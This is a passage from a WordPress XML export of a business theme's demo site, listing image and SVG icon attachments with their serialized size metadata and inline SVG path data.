		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/bg2-service-detail2.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/bg2-service-detail2.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:660;s:4:"file";s:33:"2020/09/bg2-service-detail2.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:33:"bg2-service-detail2-1-300x103.jpg";s:5:"width";i:300;s:6:"height";i:103;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:34:"bg2-service-detail2-1-1024x352.jpg";s:5:"width";i:1024;s:6:"height";i:352;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:33:"bg2-service-detail2-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:33:"bg2-service-detail2-1-768x264.jpg";s:5:"width";i:768;s:6:"height";i:264;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:34:"bg2-service-detail2-1-1536x528.jpg";s:5:"width";i:1536;s:6:"height";i:528;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:33:"bg2-service-detail2-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:33:"bg2-service-detail2-1-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:34:"bg2-service-detail2-1-1200x600.jpg";s:5:"width";i:1200;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:34:"bg2-service-detail2-1-1200x660.jpg";s:5:"width";i:1200;s:6:"height";i:660;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>energy</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/our-services/business-consulting/energy/</link>
		<pubDate>Thu, 17 Sep 2020 08:34:26 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/energy.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>980</wp:post_id>
		<wp:post_date><![CDATA[2020-09-17 08:34:26]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-17 08:34:26]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[energy]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>977</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/energy.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/energy.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 -9 512.00092 512"><path d="m243.273438 147.371094c-4.140626 0-7.5 3.359375-7.5 7.5v74.769531c0 4.144531 3.359374 7.5 7.5 7.5 4.144531 0 7.5-3.355469 7.5-7.5v-74.769531c0-4.140625-3.359376-7.5-7.5-7.5zm0 0"></path><path d="m152.441406 383.160156 64.75-37.386718c3.589844-2.070313 4.816406-6.65625 2.746094-10.242188s-6.660156-4.816406-10.242188-2.746094l-64.753906 37.386719c-3.585937 2.070313-4.816406 6.65625-2.746094 10.242187 2.082032 3.605469 6.675782 4.808594 10.246094 2.746094zm0 0"></path><path d="m383.484375 349.453125-64.753906-37.386719c-3.589844-2.070312-8.175781-.839844-10.246094 2.746094s-.839844 8.171875 2.746094 10.242188l64.753906 37.386718c1.179687.679688 2.46875 1.003906 3.742187 1.003906 2.589844 0 5.113282-1.34375 6.5-3.75 2.070313-3.585937.84375-8.171874-2.742187-10.242187zm0 0"></path><path d="m63.074219 331.53125c.371093 0 .75-.027344 1.128906-.085938 4.097656-.617187 6.914063-4.4375 6.292969-8.535156-1.378906-9.132812-2.078125-18.472656-2.078125-27.757812 0-71.730469 41.214843-135.011719 103.09375-165.410156 3.71875-1.828126 5.253906-6.320313 3.425781-10.039063-1.824219-3.714844-6.316406-5.25-10.035156-3.425781-67.039063 32.929687-111.484375 101.449218-111.484375 178.875 0 10.035156.757812 20.125 2.25 30 .558593 3.714844 3.757812 6.378906 7.40625 6.378906zm0 0"></path><path d="m170.335938 166.796875c-43.941407 28.21875-70.171876 76.203125-70.171876 128.355469 0 3.332031.117188 6.808594.355469 10.34375.273438 4.101562 3.8125 7.257812 7.980469 6.984375 4.132812-.277344 7.261719-3.855469 6.984375-7.984375-.214844-3.203125-.324219-6.347656-.324219-9.34375 0-47.023438 23.65625-90.289063 63.28125-115.738282 3.484375-2.238281 4.496094-6.875 2.257813-10.359374-2.238281-3.488282-6.878907-4.496094-10.363281-2.257813zm0 0"></path><path d="m320.199219 123.789062c8.589843 3.398438 17.015625 7.492188 25.039062 12.160157 62.003907 36.074219 95.972657 103.523437 91.128907 172.296875-.292969 4.128906 2.820312 7.714844 6.953124 8.007812.179688.011719.355469.015625.535157.015625 3.898437 0 7.195312-3.019531 7.472656-6.972656 5.25-74.5-31.621094-147.375-98.546875-186.3125-8.671875-5.042969-17.773438-9.464844-27.0625-13.144531-3.851562-1.523438-8.210938.363281-9.734375 4.214844-1.523437 3.851562.363281 8.207031 4.214844 9.734374zm0 0"></path><path d="m313.492188 171.933594c2.867187 1.421875 5.640624 2.90625 8.234374 4.417968 40.648438 23.648438 66.148438 65.855469 68.21875 112.902344.175782 4.023438 3.496094 7.167969 7.484376 7.167969.113281 0 .226562 0 .335937-.007813 4.140625-.179687 7.34375-3.683593 7.164063-7.820312-2.296876-52.171875-30.578126-98.976562-75.660157-125.207031-2.882812-1.675781-5.953125-3.324219-9.117187-4.890625-3.710938-1.839844-8.210938-.320313-10.050782 3.386718-1.839843 3.710938-.320312 8.210938 3.390626 10.050782zm0 0"></path><path d="m371.164062 436.148438c-7.078124 5.9375-14.6875 11.398437-22.609374 16.234374-61.472657 37.511719-136.953126 35-194.902344-1.839843-3.492188-2.222657-8.132813-1.191407-10.351563 2.304687-2.222656 3.496094-1.191406 8.128906 2.304688 10.351563 63.878906 40.613281 145.515625 41.800781 210.761719 1.984375 8.5625-5.222656 16.78125-11.125 24.4375-17.542969 3.171874-2.664063 3.585937-7.390625.925781-10.566406-2.660157-3.171875-7.390625-3.589844-10.566407-.925781zm0 0"></path><path d="m332.015625 425.285156c2.855469-1.738281 5.761719-3.65625 8.648437-5.695312 3.382813-2.386719 4.1875-7.066406 1.796876-10.449219-2.390626-3.382813-7.066407-4.1875-10.453126-1.800781-2.609374 1.847656-5.234374 3.574218-7.804687 5.140625-40.136719 24.5-89.390625 26.84375-131.757813 6.273437-3.726562-1.808594-8.214843-.253906-10.023437 3.472656-1.808594 3.722657-.253906 8.210938 3.472656 10.019532 46.933594 22.789062 101.5625 20.230468 146.121094-6.960938zm0 0"></path><path d="m506.246094 418.738281-153.742188-142.207031c-1.605468-1.488281-3.773437-2.199219-5.953125-1.945312l-45.195312 5.210937c-1.582031-5-3.917969-9.667969-6.863281-13.875l-6.4375-176.585937c-.148438-4.136719-3.628907-7.382813-7.765626-7.21875-4.140624.148437-7.371093 3.628906-7.222656 7.765624l5.882813 161.445313c-15.636719-9.433594-35.507813-9.710937-51.355469-.75l-24.09375-32.464844 45.523438-200.886719c.296874-1.3125 1.445312-2.226562 2.789062-2.226562h15.765625c1.546875 0 2.800781 1.210938 2.859375 2.753906l1.707031 46.886719c.152344 4.140625 3.652344 7.359375 7.769531 7.21875 4.136719-.148437 7.371094-3.625 7.222657-7.765625l-1.710938-46.886719c-.351562-9.648437-8.191406-17.207031-17.847656-17.207031h-15.765625c-8.398438 0-15.5625 5.722656-17.414062 13.910156l-46.285157 204.25c-.484375 2.132813-.011719 4.371094 1.289063 6.125l26.355468 35.511719c-7.160156 7.457031-12.089843 17.070313-13.6875 27.757813l-193.675781 121.4375c-8.183593 5.128906-10.808593 15.699218-5.980469 24.058593l7.882813 13.65625c3.273437 5.664063 9.167969 8.941407 15.40625 8.941407 1.773437 0 3.574219-.265626 5.351563-.816407l45.554687-14.128906c3.957031-1.226563 6.171875-5.429687 4.941406-9.382813-1.226562-3.957031-5.425781-6.167968-9.382812-4.941406l-45.558594 14.128906c-1.28125.398438-2.652344-.136718-3.324219-1.300781l-7.882812-13.65625c-.773438-1.335937-.351563-3.027343.957031-3.851562l186.105469-116.6875c3.703125 18.878906 17.835937 34.054687 36.125 39.28125l-15.246094 35.195312-123.925781 38.4375c-3.957031 1.226563-6.167969 5.425781-4.941407 9.382813 1.226563 3.957031 5.429688 6.167968 9.386719 4.941406l127.21875-39.457031c2.085938-.648438 3.789063-2.175781 4.660157-4.183594l18.359374-42.386719c1.921876-.054687 3.816407-.214844 5.679688-.476562l218.09375 115.535156c2.683594 1.421875 5.558594 2.101562 8.390625 2.101562 6.167969 0 12.125-3.21875 15.433594-8.949218l7.886719-13.65625c4.195312-7.273438 2.824218-16.335938-3.339844-22.039063zm-253.636719-87.476562c-20.011719 0-36.109375-16.453125-36.109375-36.109375 0-19.941406 16.238281-36.105469 36.109375-36.105469 19.875 0 36.105469 16.195313 36.105469 36.105469 0 19.675781-15.972656 36.109375-36.105469 36.109375zm243.984375 102.015625-7.882812 13.65625c-.769532 1.335937-2.441407 1.820312-3.8125 1.09375l-205.929688-109.089844c15.308594-9.246094 24.945312-26.113281 24.742188-44.3125l41.136718-4.746094 151.214844 139.871094c.984375.914062 1.207031 2.363281.53125 3.527344zm0 0"></path></svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>bg1-service-detail3</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/our-services/business-consulting/bg1-service-detail3/</link>
		<pubDate>Thu, 17 Sep 2020 08:48:47 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/bg1-service-detail3.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>982</wp:post_id>
		<wp:post_date><![CDATA[2020-09-17 08:48:47]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-17 08:48:47]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[bg1-service-detail3]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>977</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/bg1-service-detail3.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/bg1-service-detail3.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:870;s:6:"height";i:420;s:4:"file";s:33:"2020/09/bg1-service-detail3.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:33:"bg1-service-detail3-1-300x145.jpg";s:5:"width";i:300;s:6:"height";i:145;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:33:"bg1-service-detail3-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:33:"bg1-service-detail3-1-768x371.jpg";s:5:"width";i:768;s:6:"height";i:371;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:33:"bg1-service-detail3-1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:33:"bg1-service-detail3-1-600x420.jpg";s:5:"width";i:600;s:6:"height";i:420;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>graph</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/home/graph/</link>
		<pubDate>Wed, 30 Sep 2020 08:03:12 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/graph.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1081</wp:post_id>
		<wp:post_date><![CDATA[2020-09-30 08:03:12]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-30 08:03:12]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[graph]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>1023</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/graph.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/graph.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<path d="M326.623,133.062c13.785,0,25-11.215,25-25s-11.215-25.001-25-25.001s-25,11.216-25,25.001   c0,5.63,1.872,10.83,5.025,15.014l-41.076,57.401c-2.451-0.805-5.066-1.247-7.784-1.247c-6.569,0-12.551,2.551-17.017,6.709   l-27.379-15.536c0.365-1.696,0.561-3.454,0.561-5.257c0-13.785-11.215-25-25-25s-25,11.215-25,25c0,1.803,0.196,3.561,0.561,5.257   l-27.379,15.536c-4.466-4.158-10.448-6.708-17.017-6.708c-13.785,0-25,11.216-25,25.001s11.215,25.001,25,25.001   s25-11.216,25-25.001c0-1.803-0.196-3.561-0.561-5.257l27.379-15.536c4.466,4.158,10.448,6.709,17.017,6.709   c6.569,0,12.55-2.551,17.017-6.708l27.379,15.536c-0.365,1.696-0.561,3.454-0.561,5.257c0,13.785,11.215,25.001,25,25.001   c13.786,0,25.001-11.216,25.001-25.001c0-5.631-1.873-10.832-5.026-15.016l41.076-57.401   C321.289,132.62,323.905,133.062,326.623,133.062z M326.623,98.061c5.514,0,10,4.486,10,10.001c0,5.514-4.486,10-10,10   s-10-4.486-10-10C316.622,102.547,321.108,98.061,326.623,98.061z M120.115,214.231c-5.514,0-10-4.486-10-10.001   s4.486-10.001,10-10.001s10,4.486,10,10.001S125.629,214.231,120.115,214.231z M188.951,175.146c-5.514,0-10-4.486-10-10.001   c0-5.514,4.486-10,10-10s10,4.486,10,10C198.952,170.66,194.465,175.146,188.951,175.146z M257.787,214.231   c-5.514,0-10-4.486-10-10.001s4.486-10.001,10-10.001c5.515,0,10.001,4.486,10.001,10.001S263.301,214.231,257.787,214.231z"></path>
	<path d="M418.796,376.965H366.31H80.428H21.215c-3.427,0-6.215-2.788-6.215-6.215V61.331c0-3.427,2.788-6.215,6.215-6.215h35.356   c4.142,0,7.5-3.357,7.5-7.5s-3.358-7.5-7.5-7.5H21.215C9.517,40.116,0,49.633,0,61.331V370.75c0,11.698,9.517,21.215,21.215,21.215   h51.713v16.506c0,9.403,7.65,17.053,17.053,17.053h75.074l-35.34,68.998c-1.888,3.687-0.431,8.206,3.256,10.095   c1.094,0.561,2.262,0.826,3.413,0.826c2.725,0,5.354-1.49,6.681-4.083l38.843-75.836h82.922l38.843,75.836   c1.328,2.593,3.956,4.083,6.681,4.083c1.151,0,2.319-0.267,3.413-0.826c3.687-1.889,5.145-6.408,3.256-10.095l-35.34-68.998h75.074   c9.403,0,17.053-7.649,17.053-17.053v-16.506h44.986c4.142,0,7.5-3.357,7.5-7.5S422.938,376.965,418.796,376.965z M358.81,408.471   c0,1.132-0.921,2.053-2.053,2.053H89.981c-1.132,0-2.053-0.921-2.053-2.053v-16.506H358.81V408.471z"></path>
	<path d="M86.571,55.116h102.672h68.251h168.028c3.427,0,6.215,2.788,6.215,6.215v71.311c0,4.143,3.358,7.5,7.5,7.5   s7.5-3.357,7.5-7.5V61.331c0-11.698-9.517-21.215-21.215-21.215H264.995V25.374c0-10.375-8.441-18.816-18.817-18.816H200.56   c-10.375,0-18.817,8.441-18.817,18.816v14.742H86.571c-4.142,0-7.5,3.357-7.5,7.5S82.429,55.116,86.571,55.116z M196.743,25.374   c0-2.104,1.712-3.816,3.817-3.816h45.618c2.104,0,3.817,1.712,3.817,3.816v14.742h-53.251V25.374z"></path>
	<path d="M104.902,267.576c-4.142,0-7.5,3.357-7.5,7.5v66.272c0,4.143,3.358,7.5,7.5,7.5h30.427c4.142,0,7.5-3.357,7.5-7.5v-66.272   c0-4.143-3.358-7.5-7.5-7.5H104.902z M127.829,333.849h-15.427v-51.272h15.427V333.849z"></path>
	<path d="M173.737,229.248c-4.142,0-7.5,3.357-7.5,7.5v104.601c0,4.143,3.358,7.5,7.5,7.5h30.427c4.142,0,7.5-3.357,7.5-7.5V236.748   c0-4.143-3.358-7.5-7.5-7.5H173.737z M196.665,333.849h-15.427v-89.601h15.427V333.849z"></path>
	<path d="M242.573,267.576c-4.142,0-7.5,3.357-7.5,7.5v66.272c0,4.143,3.358,7.5,7.5,7.5H273c4.142,0,7.5-3.357,7.5-7.5v-66.272   c0-4.143-3.358-7.5-7.5-7.5H242.573z M265.5,333.849h-15.427v-51.272H265.5V333.849z"></path>
	<path d="M311.409,311.832c-4.142,0-7.5,3.357-7.5,7.5v22.017c0,4.143,3.358,7.5,7.5,7.5h30.427c4.142,0,7.5-3.357,7.5-7.5   s-3.358-7.5-7.5-7.5h-22.927v-14.517C318.909,315.189,315.551,311.832,311.409,311.832z"></path>
	<path d="M508.175,384.019l-43.027-74.526c10.901-11.619,18.839-25.816,23.079-41.64c6.777-25.291,3.299-51.708-9.793-74.384   c-27.026-46.813-87.097-62.906-133.907-35.881c-46.811,27.025-62.906,87.096-35.88,133.907   c13.092,22.676,34.231,38.896,59.522,45.674c8.446,2.263,17.015,3.382,25.53,3.382c7.442,0,14.841-0.856,22.077-2.55l43.018,74.528   c5.273,9.137,14.875,14.25,24.737,14.249c4.833,0,9.729-1.229,14.208-3.813c8.796-5.077,14.261-14.544,14.261-24.706   C512,393.28,510.678,388.357,508.175,384.019z M372.051,322.68c-21.421-5.74-39.326-19.479-50.415-38.685   c-22.89-39.648-9.257-90.526,30.39-113.417c13.043-7.53,27.296-11.106,41.374-11.106c28.715,0,56.683,14.893,72.043,41.497   c11.088,19.206,14.034,41.58,8.294,63.002c-5.74,21.422-19.479,39.325-38.685,50.414   C415.847,325.474,393.473,328.418,372.051,322.68z M490.242,409.973c-6.453,3.726-14.733,1.508-18.456-4.942l-41.388-71.704   c4.148-1.693,8.21-3.673,12.156-5.951c3.949-2.28,7.689-4.818,11.23-7.566l41.4,71.707c1.188,2.061,1.816,4.393,1.816,6.743   C497,403.078,494.41,407.567,490.242,409.973z"></path>
	<path d="M461.542,263.611c5.295-17.056,4.034-35.316-3.551-51.416c-1.766-3.748-6.234-5.354-9.981-3.589   c-3.748,1.766-5.354,6.234-3.588,9.981c5.983,12.7,6.976,27.109,2.795,40.575c-4.204,13.54-13.286,24.903-25.573,31.997   c-13.002,7.508-28.151,9.5-42.652,5.615c-14.502-3.886-26.624-13.187-34.13-26.189c-15.497-26.841-6.267-61.285,20.574-76.782   c19.625-11.329,43.98-9.815,62.051,3.857c3.304,2.5,8.007,1.849,10.506-1.455c2.499-3.303,1.848-8.007-1.456-10.506   c-22.891-17.321-53.745-19.238-78.602-4.887c-16.472,9.51-28.255,24.866-33.178,43.238s-2.396,37.562,7.114,54.034   c9.51,16.473,24.866,28.255,43.238,33.179c6.135,1.644,12.361,2.457,18.546,2.457c12.338,0,24.517-3.236,35.488-9.571   C444.71,295.163,456.216,280.767,461.542,263.611z"></path>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>notebook</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/home/notebook/</link>
		<pubDate>Wed, 30 Sep 2020 10:00:59 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/notebook.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1108</wp:post_id>
		<wp:post_date><![CDATA[2020-09-30 10:00:59]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-30 10:00:59]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[notebook]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>1023</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/notebook.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/notebook.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 511.989 511.989" style="enable-background:new 0 0 511.989 511.989;" xml:space="preserve">
<g>
	<path d="M504.89,145.383L320.201,38.759c-3.291-1.906-7.127-2.413-10.798-1.43c-3.673,0.985-6.74,3.344-8.627,6.628l-12.728,22.041   c-1.799-0.322-3.647-0.5-5.537-0.5H156.94c-4.142,0-7.5,3.357-7.5,7.5s3.358,7.5,7.5,7.5h125.57c9.021,0,16.36,7.334,16.36,16.35   v346.95c0,9.016-7.339,16.351-16.36,16.351H61.05c-9.021,0-16.36-7.335-16.36-16.351v-45.304h18.954   c5.921,0,10.739-4.817,10.739-10.739v-19.435c0-5.921-4.817-10.738-10.739-10.738H10.739C4.817,357.583,0,362.4,0,368.321v19.435   c0,5.922,4.817,10.739,10.739,10.739H29.69v45.304c0,17.287,14.068,31.351,31.36,31.351h221.46c17.292,0,31.36-14.063,31.36-31.351   V307.929l47.71,27.545c1.181,0.682,2.471,1.006,3.743,1.006c2.592,0,5.113-1.345,6.502-3.751c2.071-3.587,0.842-8.174-2.745-10.245   l-55.21-31.875v-23.21l65.26,37.675c1.182,0.682,2.471,1.006,3.743,1.006c2.592,0,5.113-1.345,6.502-3.751   c2.071-3.588,0.842-8.175-2.745-10.245l-72.76-42.005V226.87l82.81,47.814c1.182,0.682,2.471,1.006,3.744,1.006   c2.591,0,5.113-1.345,6.502-3.751c2.071-3.587,0.842-8.174-2.745-10.245l-90.311-52.146v-23.209l100.36,57.945   c1.181,0.682,2.471,1.006,3.743,1.006c2.592,0,5.113-1.345,6.502-3.751c2.071-3.587,0.842-8.174-2.745-10.245l-107.86-62.275   v-72.17c0-10.015-4.727-18.94-12.062-24.684l11.565-20.026l183.342,105.846L337.944,432.978c-3.462-1.548-7.608-0.26-9.548,3.099   c-2.072,3.586-0.845,8.174,2.742,10.246c2.23,1.289,4.669,1.901,7.08,1.901c4.915-0.001,9.707-2.549,12.347-7.105l159.538-276.324   C513.999,158.015,511.665,149.31,504.89,145.383z M15,372.583h44.383v10.912H15V372.583z"></path>
	<path d="M430.955,155.172l-82.268-47.497c-3.588-2.071-8.174-0.843-10.245,2.745c-2.071,3.587-0.842,8.174,2.745,10.245   l82.268,47.497c1.181,0.682,2.471,1.006,3.743,1.006c2.592,0,5.113-1.345,6.502-3.751   C435.771,161.83,434.542,157.243,430.955,155.172z"></path>
	<path d="M10.739,153.406H29.69v55.593c0,4.143,3.358,7.5,7.5,7.5s7.5-3.357,7.5-7.5v-55.593h18.954   c5.921,0,10.739-4.817,10.739-10.739v-19.435c0-5.922-4.817-10.739-10.739-10.739H44.69V96.848c0-9.016,7.339-16.35,16.36-16.35   h65.9c4.142,0,7.5-3.357,7.5-7.5s-3.358-7.5-7.5-7.5h-65.9c-17.292,0-31.36,14.063-31.36,31.35v15.645H10.739   C4.817,112.493,0,117.31,0,123.232v19.435C0,148.589,4.817,153.406,10.739,153.406z M15,127.493h44.383v10.913H15V127.493z"></path>
	<path d="M10.739,275.95h18.952v59.254c0,4.143,3.358,7.5,7.5,7.5s7.5-3.357,7.5-7.5V275.95h18.953   c5.921,0,10.739-4.817,10.739-10.738v-19.435c0-5.922-4.817-10.739-10.739-10.739H10.739C4.817,235.038,0,239.855,0,245.777v19.435   C0,271.133,4.817,275.95,10.739,275.95z M15,250.038h44.383v10.912H15V250.038z"></path>
	<path d="M103.629,147.61v38.978c0,7.112,5.786,12.898,12.898,12.898h110.504c7.112,0,12.898-5.786,12.898-12.898V147.61   c0-7.112-5.786-12.898-12.898-12.898H116.527C109.415,134.712,103.629,140.498,103.629,147.61z M118.629,149.712H224.93v34.774   H118.629V149.712z"></path>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>badge</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/home/badge/</link>
		<pubDate>Thu, 01 Oct 2020 07:46:05 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/badge.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1150</wp:post_id>
		<wp:post_date><![CDATA[2020-10-01 07:46:05]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-01 07:46:05]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[badge]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>1023</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/badge.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/10/badge.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
